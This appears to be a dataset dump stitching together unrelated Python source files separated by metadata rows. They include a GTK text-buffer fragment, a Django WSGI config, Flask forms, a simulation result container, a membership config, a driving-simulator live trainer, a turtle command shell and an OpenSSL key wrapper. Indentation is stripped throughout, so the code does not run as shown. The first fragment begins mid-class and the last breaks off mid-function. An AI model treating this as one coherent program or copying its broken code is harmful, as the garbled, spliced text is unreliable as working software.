def _sighandler_insert_text(self, buf, text_iter, ins_text, ins_len):
self.undoer.record_action(delete_fn, self, text_iter.get_offset(), ins_len)
def _sighandler_delete_range(self, buf, del_iter_start, del_iter_end):
ins_text = buf.get_text(del_iter_start, del_iter_end)
self.undoer.record_action(insert_fn, self, ins_text,
del_iter_start.get_offset())
def get_iter_at_coords(self, x, y):
bx, by = self.view.window_to_buffer_coords(gtk.TEXT_WINDOW_WIDGET, x, y)
return self.view.get_iter_at_location(bx, by)
def get_word_at_coords(self, x, y, max_length=20):
iter_begin = self.get_iter_at_coords(x, y)
if iter_begin.get_char().isalnum():
iter_end = iter_begin.copy()
isnotalnum = lambda c, _: not c.isalnum()
if iter_begin.backward_find_char(isnotalnum, None, None):
if iter_begin.forward_char():
if iter_end.forward_find_char(isnotalnum, (), None):
return self.buf.get_text(iter_begin, iter_end)
return None
| lgpl-2.1 | -547,014,662,898,154,300 | 33.625899 | 79 | 0.666528 | false |
TeamBasedLearning/Service | pgtbl/tbl/wsgi.py | 1 | 1382 | """
WSGI config for tbl project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "oauth2.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tbl.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
application = get_wsgi_application()
| gpl-3.0 | -4,567,427,804,351,289,300 | 42.1875 | 79 | 0.787265 | false |
PNJenkinson/emicroblog | app/forms.py | 1 | 1508 | from flask_wtf import Form
from flask_babel import gettext
from wtforms import StringField, BooleanField, TextAreaField
from wtforms.validators import DataRequired, Length
from .models import User
class LoginForm(Form):
openid = StringField('openid', validators=[DataRequired()])
remember_me = BooleanField('remember_me', default=False)
class EditForm(Form):
nickname = StringField('nickname', validators=[DataRequired()])
about_me = TextAreaField('about_me', validators=[Length(min=0, max=140)])
def __init__(self, original_nickname, *args, **kwargs):
Form.__init__(self, *args, **kwargs)
self.original_nickname = original_nickname
def validate(self):
if not Form.validate(self):
return False
if self.nickname.data == self.original_nickname:
return True
if self.nickname.data != User.make_valid_nickname(self.nickname.data):
self.nickname.errors.append(gettext(
'This nickname has invalid characters. '
'Please use letters, numbers, dots and underscores only.'))
return False
user = User.query.filter_by(nickname=self.nickname.data).first()
if user is not None:
self.nickname.errors.append(gettext(
'This nickname is already in use. '
'Please choose another one.'))
return False
return True
class PostForm(Form):
post = StringField('post', validators=[DataRequired()])
| bsd-3-clause | -8,724,458,139,495,668,000 | 34.069767 | 78 | 0.649867 | false |
haihabi/simpy | simpy/core/result/container.py | 1 | 5182 | import simpy
import numpy as np
import pickle
import os
class Result(object):
def __init__(self, test_case, *args):
self.test_case = test_case
if len(args) == 0:
            raise Exception('result args cannot be empty')
        elif len(args) % 2 != 0:
            raise Exception('result args must contain an even number of items (name/value pairs)')
else:
result = dict()
for i in range(round(args.__len__())):
if i % 2 == 0:
name = args[i]
if not isinstance(name, str):
                        raise Exception('the first item of each pair must be a string')
if i % 2 == 1:
if result.get(name) is None:
result.update({name: args[i]})
else:
                    raise Exception('result already exists')
self.result = result
def has_same_param(self, result):
return self.test_case.has_same_param(result.test_case)
def get_result(self, name):
res = self.result.get(name)
if res is None:
            raise Exception('result name: ' + name + ' does not exist')
return res
def get_test_name(self):
return self.test_case.get_name()
def get_result_dict(self):
return self.result
class ResultContainer(object):
    def __init__(self, global_params, test_result=None):
        self.global_params = global_params
        # use None as the default to avoid sharing one mutable list between instances
        self.test_result = test_result if test_result is not None else []
self.current = 0
def clear(self):
self.test_result.clear()
def is_empty(self):
return self.test_result.__len__() == 0
def add_result(self, result):
if not isinstance(result, Result):
raise Exception('input must be of type result')
self.test_result.append(result)
def __iter__(self):
return self
    def __next__(self):
if self.current >= self.test_result.__len__():
raise StopIteration
else:
test_result = self.test_result[self.current]
self.current += 1
return test_result
def reset_iterator(self):
self.current = 0
def recreate_iterator(self):
return ResultContainer(self.global_params, self.test_result)
def get_test_cases(self):
return [i.test_case for i in self.test_result]
def __build_result__(self):
result_dict_list = []
test_list = []
for r in self.recreate_iterator():
result_dict_list.append(r.get_result_dict())
test_list.append(r.get_test_name())
return result_dict_list, test_list
def plot_result(self, plot_cfg_list, path_save=None):
"""
        This function gets a list of plot configs and plots them on the same figure
        :param plot_cfg_list: list of plot configs
        :param path_save: None or a directory path to save the figures into
:return: Nothing
"""
assert isinstance(plot_cfg_list, list)
assert np.all([isinstance(plot_cfg, simpy.PlotConfiguration) for plot_cfg in plot_cfg_list])
result_dict_list, test_list = self.__build_result__()
[plot_cfg.plot_multiple_result(result_dict_list, test_list, True,
save=os.path.join(path_save, 'figure' + str(i) + '.png')) for i, plot_cfg in
enumerate(plot_cfg_list)]
def plot_test_by_test(self, plot_cfg_list, path_save=None):
assert isinstance(plot_cfg_list, list)
assert np.all([isinstance(plot_cfg, simpy.PlotConfiguration) for plot_cfg in plot_cfg_list])
result_dict_list, test_list = self.__build_result__()
for rdl, tl in zip(result_dict_list, test_list):
test_base = os.path.join(path_save, tl)
os.mkdir(test_base)
[plot_cfg.plot_multiple_result([rdl], [tl], True,
save=os.path.join(test_base, 'figure' + str(i) + '.png')) for i, plot_cfg in
enumerate(plot_cfg_list)]
def print_summary(self, data_post_processing, save=None):
result_dict_list, test_list = self.__build_result__()
output_str = self.summary_function(data_post_processing, result_dict_list, test_list)
print(output_str)
if save is not None:
text_file = open(save, "w")
text_file.write(output_str)
text_file.close()
print("Saving summary to file:" + save)
@staticmethod
def summary_function(data_post_processing, result_dict_list, test_list):
output_str = ''
for tn, rd in zip(test_list, result_dict_list):
output_str = output_str + tn + '[ '
for m, pf in data_post_processing.items():
output_str = output_str + m + ':' + str(pf(rd.get(m))) + ' '
output_str = output_str + ' ]' + "\n"
return output_str
@staticmethod
def loader(file_path):
res = pickle.load(open(file_path, "rb"))
        if not isinstance(res, ResultContainer):
            raise Exception('the loaded pickle is not of type ResultContainer')
return res
def saver(self, file_path):
pickle.dump(self, open(file_path, "wb"))
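if __name__ == '__main__':
    # Hedged usage sketch (illustrative; not part of the original module). The
    # fake test case is an assumption: Result/ResultContainer in this file only
    # call get_name() and has_same_param() on it.
    class _DemoTestCase(object):
        def get_name(self):
            return 'demo_test'
        def has_same_param(self, other):
            return True
    demo = Result(_DemoTestCase(), 'throughput', 1.5, 'latency', 0.2)
    rc = ResultContainer(global_params={}, test_result=[demo])
    # identity post-processing: print the stored value of each metric as-is
    rc.print_summary({'throughput': lambda v: v, 'latency': lambda v: v})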
| mit | -8,767,696,397,707,231,000 | 35.751773 | 119 | 0.56677 | false |
ArthurChiao/code-snippets | python/turtleshell.py | 1 | 2878 | """
Example code from python doc:
https://docs.python.org/3.3/library/cmd.html
The Cmd class provides a simple framework for writing line-oriented command
interpreters. These are often useful for test harnesses, administrative tools,
and prototypes that will later be wrapped in a more sophisticated interface.
"""
import cmd, sys
from turtle import *
class TurtleShell(cmd.Cmd):
intro = 'Welcome to the turtle shell. Type help or ? to list commands.\n'
prompt = '(turtle) '
file = None
# ----- basic turtle commands -----
def do_forward(self, arg):
'Move the turtle forward by the specified distance: FORWARD 10'
forward(*parse(arg))
def do_right(self, arg):
'Turn turtle right by given number of degrees: RIGHT 20'
right(*parse(arg))
def do_left(self, arg):
'Turn turtle left by given number of degrees: LEFT 90'
left(*parse(arg))
def do_goto(self, arg):
'Move turtle to an absolute position with changing orientation. GOTO 100 200'
goto(*parse(arg))
def do_home(self, arg):
        'Return turtle to the home position: HOME'
home()
def do_circle(self, arg):
        'Draw circle with given radius and optional extent and steps: CIRCLE 50'
circle(*parse(arg))
def do_position(self, arg):
        'Print the current turtle position: POSITION'
print('Current position is %d %d\n' % position())
def do_heading(self, arg):
        'Print the current turtle heading in degrees: HEADING'
print('Current heading is %d\n' % (heading(),))
def do_color(self, arg):
'Set the color: COLOR BLUE'
color(arg.lower())
def do_undo(self, arg):
'Undo (repeatedly) the last turtle action(s): UNDO'
def do_reset(self, arg):
'Clear the screen and return turtle to center: RESET'
reset()
def do_bye(self, arg):
'Stop recording, close the turtle window, and exit: BYE'
print('Thank you for using Turtle')
self.close()
bye()
return True
# ----- record and playback -----
def do_record(self, arg):
'Save future commands to filename: RECORD rose.cmd'
self.file = open(arg, 'w')
def do_playback(self, arg):
'Playback commands from a file: PLAYBACK rose.cmd'
self.close()
with open(arg) as f:
self.cmdqueue.extend(f.read().splitlines())
def precmd(self, line):
line = line.lower()
if self.file and 'playback' not in line:
print(line, file=self.file)
return line
def close(self):
if self.file:
self.file.close()
self.file = None
def parse(arg):
'Convert a series of zero or more numbers to an argument tuple'
return tuple(map(int, arg.split()))
if __name__ == '__main__':
TurtleShell().cmdloop()
| mit | -8,552,807,441,469,732,000 | 34.097561 | 86 | 0.61501 | false |
sjaa/scheduler | membership/config-example.py | 1 | 1338 | from enum import Enum, unique
TEST_EMAIL_MODE = 'print' # 'test email'
TEST_EMAIL_ADDR = 'Membership Chair <[email protected]>'
@unique
class MembershipStatus(Enum):
expired = 0 # 'expired' must be < 'expiring'
expiring = 10
active = 11
admin = 100
coordator = 200
CHOICES_MEM_STATUS = (
( MembershipStatus.expired .value, 'expired' ),
( MembershipStatus.expiring.value, 'expiring'),
( MembershipStatus.active .value, 'active' )
)
# Send membership renewal notices:
# 30 and 7 days before and 1 day after expiration date
# -n means 'n' days before, n means days after expiration
RENEWAL_NOTICE_DAYS = (-30, -7, 1)
MEMBERSHIP_CHAIR_EMAIL_ADDR = 'Membership Chair <[email protected]>'
RENEWAL_NOTICE_TEXT = '''\
# To: {addr_to}
# From: {addr_from}
# Subject: {subject}
{first_name},
Your <Your org> membership will expire in {days} days on {date}. To renew your membership, please go to:
https://www.sjaa.net/join-the-sjaa/
Sincerely,
Me
<Your org> Membership Chair'''
EXPIRED_NOTICE_TEXT = '''\
# To: {addr_to}
# From: {addr_from}
# Subject: {subject}
{first_name},
Your <Your org> membership expired on {date}. To renew your membership, please go to:
https://www.sjaa.net/join-the-sjaa/
Sincerely,
Dave Ittner
<Your org> Membership Chair'''
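# Illustrative note (added; not part of the original example config): the notice
# bodies above read as plain str.format() templates. A purely hypothetical
# fill-in, with every value below made up, could look like:
#
#   body = RENEWAL_NOTICE_TEXT.format(
#       addr_to='Jane Doe <[email protected]>',
#       addr_from=MEMBERSHIP_CHAIR_EMAIL_ADDR,
#       subject='Your membership expires soon',
#       first_name='Jane', days=30, date='2024-01-31')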
| gpl-3.0 | 8,368,260,173,327,536,000 | 22.892857 | 105 | 0.655456 | false |
jingzhehu/udacity_sdcnd | term1/P3_behavior_cloning/live_trainer.py | 1 | 12049 | """
Live trainer script for Udacity SDC sim
- Control car with Keras model
- Override with manual control
- Train model during manual control
- Record data from simulator
Usage guide
- accelerate/decelerate with "up/down" arrow keys
- navigation with "left/right" arrow keys
- change steering angle to "0" with "c" key
- toggle manual/auto mode with "x" key
- while in manual mode, toggle training with "z" key
- toggle image recording with "r" key
"""
# authored by Thomas Antony
# modified by Jingzhe Hu @ 01/07/2017
# changed preprocessing and added rudimentary data recording feature
training_batch_size = 48
checkpoint_filename = './checkpoint.h5'
# hdf_recordings = "./recorded_data/data.h5"
dir_recordings = './recorded_data/'
steering_angle_recordings = "./recorded_data/steering_angle.csv"
learning_rate = 0.001
## PLEASE DO NOT EDIT PAST THIS POINT
__author__ = 'Thomas Antony'
import os
import csv
import sys
import h5py
import time
import tkinter
import argparse
import base64
import json
import cv2
import numpy as np
import pandas as pd
from server import ControlServer
from platform import system as platform
from datetime import datetime
import matplotlib.image as mpimg
import socketio
import eventlet
import eventlet.wsgi
from flask import Flask
from functools import partial
from keras.models import model_from_json
from keras.optimizers import Adam, RMSprop
class LiveTrainer(object):
def __init__(self, model):
# Control variables
self.steering_angle = 0
self.throttle = 0
# State
self.speed = 0
# Parameters
self.speed_limit = 30
self.turn_rate = 0.5
self.steering_limit = 15. / 25.
self.centering_torque = 0.01 / 25.
# Helper functions
self.turn_left = partial(self.turn, direction=-1)
self.turn_right = partial(self.turn, direction=+1)
self.speed_up = partial(self.speed_control, direction=+1)
self.slow_down = partial(self.speed_control, direction=-1)
# Control server for getting data from simulator
self.control_srv = ControlServer()
self.control_srv.register_callback(self) # Callback for telemetry
self.mode = 'auto' # can be 'auto' or 'manual'
self.is_training = False # Trains model if set to true
self.is_recording = False # Record camera images and steering angle
# self.recorded_images = []
# self.recorded_steering_angles = []
self.model = model
self.current_X = [] # List of images
self.current_Y = [] # List of steering angles
# Performance metrics
self.start_time = None
self.last_switch_time = None
self.auto_time = 0
def init_gui(self):
# Create the root window
self.root = tkinter.Tk()
self.root.geometry('350x100+490+550')
self.root.title('SDC Live Trainer')
# Create a label with status
self.status = tkinter.StringVar()
label = tkinter.Label(self.root, width=350, height=100,
textvariable=self.status)
label.pack(fill=tkinter.BOTH, expand=1)
# Bind key event handlers
self.root.bind('<Left>', lambda e: self.turn_left())
self.root.bind('<Right>', lambda e: self.turn_right())
self.root.bind('<Up>', lambda e: self.speed_up())
self.root.bind('<Down>', lambda e: self.slow_down())
self.root.bind('<Key>', self.keydown)
self.update_status()
# Start UI loop
eventlet.spawn_after(1, self.main_loop)
def start_server(self):
self.control_srv.start() # Start server
def focus_gui(self):
self.root.focus_force()
# OSX code for focusing window
if platform() == 'Darwin':
os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
def main_loop(self):
self.focus_gui()
while True:
try:
self.root.update_idletasks()
self.root.update()
except:
pass
eventlet.sleep(0.01)
def update_status(self):
str_mode = 'Autopilot Engaged' if self.mode == 'auto' else 'Manual override'
str_train_text = 'Training neural net ...' if self.is_training else ''
str_recording = 'Recording images and steering angle ...' if self.is_recording else ''
if self.start_time is not None:
now = time.time()
total_time = now - self.start_time
auto_time = self.auto_time
if self.mode == 'auto':
auto_time += (now - self.last_switch_time)
str_rating = auto_time / total_time
else:
str_rating = 0.0
        status_txt = '{0}\nAutonomous rating: {1:.2%}\n{2}\n{3}\nSpeed = {4:4.2f} mph, Steering angle = {5:4.2f} deg'
self.status.set(status_txt.format(str_mode, str_rating, str_train_text, str_recording, self.speed, self.steering_angle * 25))
def update_timers(self):
"""
Triggered after a mode change or at start.
"""
# Update timers for autonomous mode
if self.mode == 'auto':
self.last_switch_time = time.time()
else:
self.auto_time += time.time() - self.last_switch_time
def keydown(self, event):
if event.char == 'q':
self.root.destroy()
os._exit(0) # Sledgehammer
elif event.char == 'c' or event.char == 'C':
self.reset_steering()
elif event.char == 'x' or event.char == 'X':
if self.mode == 'manual':
self.is_training = False # No training in autonomous mode
self.mode = 'auto'
else:
self.mode = 'manual'
self.update_timers()
elif event.char == 'z' or event.char == 'Z':
# Toggle flag (only in manual mode)
if self.mode == 'manual':
self.is_training = not self.is_training
elif event.char == "r" or event.char == "R":
self.is_recording = not self.is_recording
def speed_control(self, direction):
"""
direction = +1 for increase, -1 for decrease
"""
self.speed += direction * 1
self.speed = max(0, self.speed)
self.speed = min(self.speed_limit, self.speed)
self.update_status()
def update_throttle(self, data):
"""
Implements P-controller for speed
"""
throttle_max = 1.0
throttle_min = -1.0
K = 0.35 # Proportional gain
self.throttle = (self.speed - data['speed']) * K
self.throttle = min(throttle_max, self.throttle)
self.throttle = max(throttle_min, self.throttle)
def update_steering(self, data):
"""
Implements a simple centering torque for the manual steering
"""
if self.mode == 'manual':
if abs(self.steering_angle) < self.centering_torque:
self.steering_angle = 0.0
elif self.steering_angle > 0:
self.steering_angle -= self.centering_torque
elif self.steering_angle < 0:
self.steering_angle += self.centering_torque
def turn(self, direction=None):
"""
direction = +1 for right, -1 for left
"""
self.steering_angle += direction * self.turn_rate / 25.
self.steering_angle = max(self.steering_angle, -self.steering_limit)
self.steering_angle = min(self.steering_angle, +self.steering_limit)
self.update_status()
def reset_steering(self):
self.steering_angle = 0.0
self.update_status()
def preprocess_input(self, img):
''' Crop, resize and convert input image from RGB to HLS colorspace
:param self:
:param img: np array of uint8
:return: preprocessed image
'''
img = cv2.resize(img[60:140, 40:280], (200, 66))
return cv2.cvtColor(img, cv2.COLOR_RGB2HLS).astype("float32")
def predict_steering(self, data):
x = self.preprocess_input(data['image'])
x = x[None, :, :, :] # Extend dimension
return float(model.predict(x, batch_size=1))
def save_batch(self, data):
"""
Saves training data in current batch to disk.
"""
# TODO: Implement save_batch()
pass
def train_model(self, model, X_train, y_train):
h = model.fit(X_train, y_train,
nb_epoch=1, verbose=0, batch_size=training_batch_size)
model.save_weights(checkpoint_filename)
print('loss : ', h.history['loss'][-1])
return model
def process_data(self, data):
"""
If current batch is full, train the model, save data and reset cache.
else just save data into batch
"""
img = self.preprocess_input(data['image'])
steering_angle = self.steering_angle
# randomly flip training image horizontally
flip = np.random.choice([True, False])
if flip:
img = cv2.flip(img, 1)
steering_angle = -steering_angle
self.current_X.append(img)
self.current_Y.append(steering_angle)
if len(self.current_Y) == training_batch_size:
X_train = np.array(self.current_X)
y_train = np.array(self.current_Y)
print('Training model ...')
self.train_model(self.model, X_train, y_train)
self.save_batch((X_train, y_train))
# Reset internal batch
self.current_X = []
self.current_Y = []
# Callback functions triggered by ControlServer
def handle_connect(self, sid):
self.start_time = time.time() # Reset timer
self.auto_time = 0.0
self.last_switch_time = None
self.update_timers()
# Focus window when simulator connects
self.focus_gui()
def handle_telemetry(self, data):
if self.mode == 'auto':
self.steering_angle = self.predict_steering(data)
elif self.mode == 'manual':
steering_angle = self.steering_angle
if self.is_training:
self.process_data(data)
if self.is_recording:
# Todo: write to hdf5 store instead
img_filename = "center_"+str(datetime.now()) + '.jpg'
mpimg.imsave(os.path.join(dir_recordings, img_filename),
data["image"].astype("uint8"))
# print(img_filename)
# with pd.HDFStore(hdf_recordings) as hdf_file:
# hdf_file.append()
                # check for the header *before* open() creates the file in append mode
                write_header = not os.path.exists(steering_angle_recordings)
                with open(steering_angle_recordings, "a") as csv_file:
                    csv_writer = csv.writer(csv_file, delimiter=",")
                    if write_header:
                        csv_writer.writerow(['center', 'steering'])
                    csv_writer.writerow([img_filename, self.steering_angle])
# Send current control variables to simulator
self.control_srv.send_control(self.steering_angle, self.throttle)
# Update UI
self.update_status()
# Steering dynamics and speed controller
self.update_steering(data)
self.update_throttle(data)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Remote Driving')
parser.add_argument('model', type=str,
help='Path to model definition json. Model weights should be on the same path.')
args = parser.parse_args()
with open(args.model, 'r') as jfile:
model = model_from_json(jfile.read())
rmsprop = RMSprop(lr=learning_rate)
model.compile(rmsprop, "mae")
weights_file = args.model.replace('json', 'h5')
if os.path.exists(weights_file):
model.load_weights(weights_file)
if not os.path.exists(dir_recordings):
os.makedirs(dir_recordings)
driver = LiveTrainer(model)
driver.init_gui()
driver.start_server()
| apache-2.0 | 1,367,188,065,342,590,700 | 30.791557 | 133 | 0.592414 | false |
vbwagner/ctypescrypto | ctypescrypto/pkey.py | 1 | 19010 | """
This module provides an interface for low-level private/public keypair operations.
The PKey object of this module is a wrapper around the OpenSSL EVP_PKEY object.
"""
from ctypes import c_char, c_char_p, c_void_p, c_int, c_long, POINTER
from ctypes import create_string_buffer, byref, memmove, CFUNCTYPE
from ctypescrypto import libcrypto,pyver,bintype,chartype
from ctypescrypto.exception import LibCryptoError, clear_err_stack
from ctypescrypto.bio import Membio
__all__ = ['PKeyError', 'PKey', 'PW_CALLBACK_FUNC']
class PKeyError(LibCryptoError):
""" Exception thrown if libcrypto finctions return an error """
pass
PW_CALLBACK_FUNC = CFUNCTYPE(c_int, POINTER(c_char), c_int, c_int, c_char_p)
""" Function type for pem password callback """
def _password_callback(c):
"""
Converts given user function or string to C password callback
function, passable to openssl.
    If a function is passed, it will be called upon reading or writing
    a PEM-format private key with one argument, which is True if we are
    writing the key (and should verify the passphrase) and False if reading.
"""
if c is None:
return PW_CALLBACK_FUNC(0)
if callable(c):
if pyver ==2 :
def __cb(buf, length, rwflag, userdata):
pwd = c(rwflag)
cnt = min(len(pwd),length)
memmove(buf,pwd, cnt)
return cnt
else:
def __cb(buf, length, rwflag, userdata):
pwd = c(rwflag).encode("utf-8")
cnt = min(len(pwd),length)
memmove(buf,pwd, cnt)
return cnt
else:
if pyver > 2:
c=c.encode("utf-8")
def __cb(buf,length,rwflag,userdata):
cnt=min(len(c),length)
memmove(buf,c,cnt)
return cnt
return PW_CALLBACK_FUNC(__cb)
def _keybio(blob, format):
# But DER string should be binary
if format == "PEM" and isinstance(blob,chartype):
return Membio(blob.encode("ascii"),clone=True)
elif isinstance(blob,bintype):
return Membio(blob)
else:
raise TypeError("Key should be either blob or PEM string")
class PKey(object):
"""
Represents public/private key pair. Wrapper around EVP_PKEY
libcrypto object.
    May contain either both private and public keys (such objects can be
    used for signing and deriving a shared key, as well as for verifying)
    or a public key only, which can be used for verifying or as the peer
    key when deriving.
    @var cansign is true if the key has a private part.
    @var key contains a pointer to EVP_PKEY and should be passed to various
    libcrypto routines
"""
def __init__(self, ptr=None, privkey=None, pubkey=None, format="PEM",
cansign=False, password=None):
"""
PKey object can be created from either private/public key blob or
from C language pointer, returned by some OpenSSL function
Following named arguments are recognized by constructor
privkey - private key blob. If this is specified, format and
password can be also specified
pubkey - public key blob. If this is specified, format can be
specified.
ptr - pointer, returned by openssl function. If it is specified,
cansign should be also specified.
These three arguments are mutually exclusive.
format - can be either 'PEM' or 'DER'. Specifies format of blob.
password - can be string with password for encrypted key, or
callable with one boolean argument, which returns password.
During constructor call this argument would be false.
If key is in PEM format, its encrypted status and format is
autodetected. If key is in DER format, than if password is
specified, key is assumed to be encrypted PKCS8 key otherwise
it is assumed to be unencrypted.
"""
if not ptr is None:
self.key = ptr
self.cansign = cansign
if not privkey is None or not pubkey is None:
raise TypeError("Just one of ptr, pubkey or privkey can " +
"be specified")
elif not privkey is None:
if not pubkey is None:
raise TypeError("Just one of ptr, pubkey or privkey can " +
"be specified")
bio=_keybio(privkey,format)
self.cansign = True
if format == "PEM":
self.key = libcrypto.PEM_read_bio_PrivateKey(bio.bio, None,
_password_callback(password),
None)
else:
if password is not None:
self.key = libcrypto.d2i_PKCS8PrivateKey_bio(bio.bio,None,
_password_callback(password),
None)
else:
self.key = libcrypto.d2i_PrivateKey_bio(bio.bio, None)
if self.key is None:
raise PKeyError("error parsing private key")
elif not pubkey is None:
bio = _keybio(pubkey,format)
self.cansign = False
if format == "PEM":
self.key = libcrypto.PEM_read_bio_PUBKEY(bio.bio, None,
_password_callback(password),
None)
else:
self.key = libcrypto.d2i_PUBKEY_bio(bio.bio, None)
if self.key is None:
raise PKeyError("error parsing public key")
else:
raise TypeError("Neither public, nor private key is specified")
def __del__(self):
""" Frees EVP_PKEY object (note, it is reference counted) """
if hasattr(self,"key"):
libcrypto.EVP_PKEY_free(self.key)
def __eq__(self, other):
""" Compares two public keys. If one has private key and other
doesn't it doesn't affect result of comparation
"""
return libcrypto.EVP_PKEY_cmp(self.key, other.key) == 1
def __ne__(self, other):
""" Compares two public key for not-equality """
return not self.__eq__(other)
def __str__(self):
""" printable representation of public key """
bio = Membio()
libcrypto.EVP_PKEY_print_public(bio.bio, self.key, 0, None)
return str(bio)
def sign(self, digest, **kwargs):
"""
        Signs given digest and returns the signature
        Keyword arguments allow setting various algorithm-specific
parameters. See pkeyutl(1) manual.
"""
ctx = libcrypto.EVP_PKEY_CTX_new(self.key, None)
if ctx is None:
raise PKeyError("Initailizing sign context")
if libcrypto.EVP_PKEY_sign_init(ctx) < 1:
raise PKeyError("sign_init")
self._configure_context(ctx, kwargs)
# Find out signature size
siglen = c_long(0)
if libcrypto.EVP_PKEY_sign(ctx, None, byref(siglen), digest,
len(digest)) < 1:
raise PKeyError("computing signature length")
sig = create_string_buffer(siglen.value)
if libcrypto.EVP_PKEY_sign(ctx, sig, byref(siglen), digest,
len(digest)) < 1:
raise PKeyError("signing")
libcrypto.EVP_PKEY_CTX_free(ctx)
return sig.raw[:int(siglen.value)]
def verify(self, digest, signature, **kwargs):
"""
Verifies given signature on given digest
        Returns True if the signature matches, False if it doesn't
        Keyword arguments allow setting algorithm-specific
parameters
"""
ctx = libcrypto.EVP_PKEY_CTX_new(self.key, None)
if ctx is None:
raise PKeyError("Initailizing verify context")
if libcrypto.EVP_PKEY_verify_init(ctx) < 1:
raise PKeyError("verify_init")
self._configure_context(ctx, kwargs)
ret = libcrypto.EVP_PKEY_verify(ctx, signature, len(signature), digest,
len(digest))
if ret < 0:
raise PKeyError("Signature verification")
libcrypto.EVP_PKEY_CTX_free(ctx)
return ret > 0
def derive(self, peerkey, **kwargs):
"""
Derives shared key (DH,ECDH,VKO 34.10). Requires
private key available
@param peerkey - other key (may be public only)
Keyword parameters are algorithm-specific
"""
if not self.cansign:
raise ValueError("No private key available")
ctx = libcrypto.EVP_PKEY_CTX_new(self.key, None)
if ctx is None:
raise PKeyError("Initailizing derive context")
if libcrypto.EVP_PKEY_derive_init(ctx) < 1:
raise PKeyError("derive_init")
        # This is a workaround for missing functionality in the GOST engine:
        # it provides only a numeric control command to set the UKM, not
        # a string one.
self._configure_context(ctx, kwargs, ["ukm"])
if libcrypto.EVP_PKEY_derive_set_peer(ctx, peerkey.key) <= 0:
raise PKeyError("Cannot set peer key")
if "ukm" in kwargs:
# We just hardcode numeric command to set UKM here
if libcrypto.EVP_PKEY_CTX_ctrl(ctx, -1, 1 << 10, 8, 8,
kwargs["ukm"]) <= 0:
raise PKeyError("Cannot set UKM")
keylen = c_long(0)
if libcrypto.EVP_PKEY_derive(ctx, None, byref(keylen)) <= 0:
raise PKeyError("computing shared key length")
buf = create_string_buffer(keylen.value)
if libcrypto.EVP_PKEY_derive(ctx, buf, byref(keylen)) <= 0:
raise PKeyError("computing actual shared key")
libcrypto.EVP_PKEY_CTX_free(ctx)
return buf.raw[:int(keylen.value)]
@staticmethod
def generate(algorithm, **kwargs):
"""
Generates new private-public key pair for given algorithm
(string like 'rsa','ec','gost2001') and algorithm-specific
parameters.
        Algorithm-specific parameters for RSA:
        rsa_keygen_bits=number - size of key to be generated
        rsa_keygen_pubexp - RSA public exponent (default 65537)
Algorithm specific parameters for DSA,DH and EC
paramsfrom=PKey object
copy parameters of newly generated key from existing key
Algorithm specific parameters for GOST2001
paramset= paramset name where name is one of
'A','B','C','XA','XB','test'
paramsfrom does work too
"""
tmpeng = c_void_p(None)
if isinstance(algorithm, chartype):
alg = algorithm.encode("ascii")
else:
alg = algorithm
ameth = libcrypto.EVP_PKEY_asn1_find_str(byref(tmpeng), alg, -1)
if ameth is None:
raise PKeyError("Algorithm %s not foind\n"%(algorithm))
clear_err_stack()
pkey_id = c_int(0)
libcrypto.EVP_PKEY_asn1_get0_info(byref(pkey_id), None, None, None,
None, ameth)
#libcrypto.ENGINE_finish(tmpeng)
if "paramsfrom" in kwargs:
ctx = libcrypto.EVP_PKEY_CTX_new(kwargs["paramsfrom"].key, None)
else:
ctx = libcrypto.EVP_PKEY_CTX_new_id(pkey_id, None)
# FIXME support EC curve as keyword param by invoking paramgen
# operation
if ctx is None:
raise PKeyError("Creating context for key type %d"%(pkey_id.value))
if libcrypto.EVP_PKEY_keygen_init(ctx) <= 0:
raise PKeyError("keygen_init")
PKey._configure_context(ctx, kwargs, ["paramsfrom"])
key = c_void_p(None)
if libcrypto.EVP_PKEY_keygen(ctx, byref(key)) <= 0:
raise PKeyError("Error generating key")
libcrypto.EVP_PKEY_CTX_free(ctx)
return PKey(ptr=key, cansign=True)
def exportpub(self, format="PEM"):
"""
Returns public key as PEM or DER structure.
"""
bio = Membio()
if format == "PEM":
retcode = libcrypto.PEM_write_bio_PUBKEY(bio.bio, self.key)
else:
retcode = libcrypto.i2d_PUBKEY_bio(bio.bio, self.key)
if retcode == 0:
raise PKeyError("error serializing public key")
return str(bio)
def exportpriv(self, format="PEM", password=None, cipher=None):
"""
Returns private key as PEM or DER Structure.
If password and cipher are specified, encrypts key
        on given password, using given algorithm. Cipher must be
        a ctypescrypto.cipher.CipherType object.
        Password can be either a string or a function with one argument
        that returns the password. It is called with the argument True,
        which means that we are encrypting the key and the password should
        be verified (e.g. requested twice from the user).
"""
bio = Membio()
if cipher is None:
evp_cipher = None
else:
evp_cipher = cipher.cipher
if format == "PEM":
ret = libcrypto.PEM_write_bio_PrivateKey(bio.bio, self.key,
evp_cipher, None, 0,
_password_callback(password),
None)
if ret ==0:
raise PKeyError("error serializing private key")
return str(bio)
else:
ret = libcrypto.i2d_PKCS8PrivateKey_bio(bio.bio, self.key,
evp_cipher, None, 0,
_password_callback(password),
None)
if ret ==0:
raise PKeyError("error serializing private key")
return bintype(bio)
@staticmethod
def _configure_context(ctx, opts, skip=()):
"""
Configures context of public key operations
@param ctx - context to configure
@param opts - dictionary of options (from kwargs of calling
function)
@param skip - list of options which shouldn't be passed to
context
"""
for oper in opts:
if oper in skip:
continue
if isinstance(oper,chartype):
op = oper.encode("ascii")
else:
op = oper
if isinstance(opts[oper],chartype):
value = opts[oper].encode("ascii")
elif isinstance(opts[oper],bintype):
value = opts[oper]
else:
if pyver == 2:
value = str(opts[oper])
else:
value = str(opts[oper]).encode('ascii')
